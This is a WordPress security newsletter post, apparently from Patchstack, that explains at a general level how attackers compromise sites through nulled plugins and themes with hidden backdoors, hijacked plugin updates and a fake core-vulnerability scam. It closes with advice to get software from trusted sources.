In the past 2 issues, we’ve talked about the different ways websites are taken over by compromising privileged accounts and by exploiting security vulnerabilities in the WordPress core, plugins and themes.
Sometimes plugins and themes are not just vulnerable, but also intentionally malicious. This week, we’ll look into another common technique that hackers are using to take over websites.
This relies entirely on exploiting the weaknesses of human nature and is also known under the term called social engineering. Social engineering is all about psychology and tricking people do something that they should not be doing.
Nulled WordPress plugins and themes
A very common and widespread technique to take over websites is by making people infect their own site. Hackers get their hands on a premium plugin, from where they usually remove the code that is responsible for licensing checks and then upload them to different websites and forums for people to download it for free.
Hackers have been doing this in an organised manner, where they publish entire libraries of “free premium plugins”. These lists often get ranked by Google, so the people who are looking to download some premium plugins or themes will most likely land on one of such pages.
While those plugins/themes mostly work as expected, the underlying code has more changes to it than just the removed licence checks. They come with backdoors and malware that gives the hacker a complete control over the site.
One such group was called WP-VCD, who systematically published popular nulled plugins and themes for WordPress and used different websites to spread them to as many people as possible. You’ll find technical analysis on WP-VCD nulled plugins malware in the resources below.
Plugins with backdoors
There has been multiple cases where a developer has become tired of maintaining a project and is giving it over to a dev developer. It’s common for hackers to look for such opportunities, so they could take over the plugin and release backdoors with the official update.
Malicious developers can add different functions to create new admin accounts and control the website remotely. We’ve also seen cases in the past where the developer had no malicious intent, but built in a functional backdoor to provide support to the users.
Scams
While nulled plugins and themes are exploiting the urge to save money by giving something for free that you should actually be paying for. There are also scams which exploit other human emotions, such as fear.
A very good example is the recent scam that was impersonating WordPress core team and making claims that WordPress core has a critical vulnerability which needs to be manually patched with a special plugin.
While for many people, it was an obvious scam, there was people even on Reddit who asked for public help to restore the website. It’s also important to note, that many non-technical WordPress users might not even detect that the site got infected after installing the malware.
Conclusion
Hackers take an advantage of known human emotions, both positive (such as excitement for getting something for free) and negative (such as fear for losing something valuable). Unfortunately, there’s no firewall you can apply to human emotions and behaviour.
There are no Robin Hoods who spend their free time and money on making premium software free for the public. They always have a reason why to do that, which comes down to what we covered in the first episode.
Always make sure to get your software only from the trusted sources, and if it’s paid, please support the original developers who put their time and effort into building it. Supporting the developers also keeps them motivated, so there’s less chances the project will be handed over to the wrong hands.
PS! As a reminder, if you wish to get those episodes directly on your email. Here’s a newsletter we created just for that: http://subscribepage.io/patchstack
Stay vigilant and see you next week!
Resources:
An In-Depth Analysis Of The WP-VCD Malware – Patchstack
Fake CVE Phishing Campaign Tricks WordPress Users Into Installing Malware (patchstack.com)
Join the Conversation!
There's a dedicated thread on this post inside of The Admin Bar community. Join in on the conversation, ask questions, and learn more!
Group Thread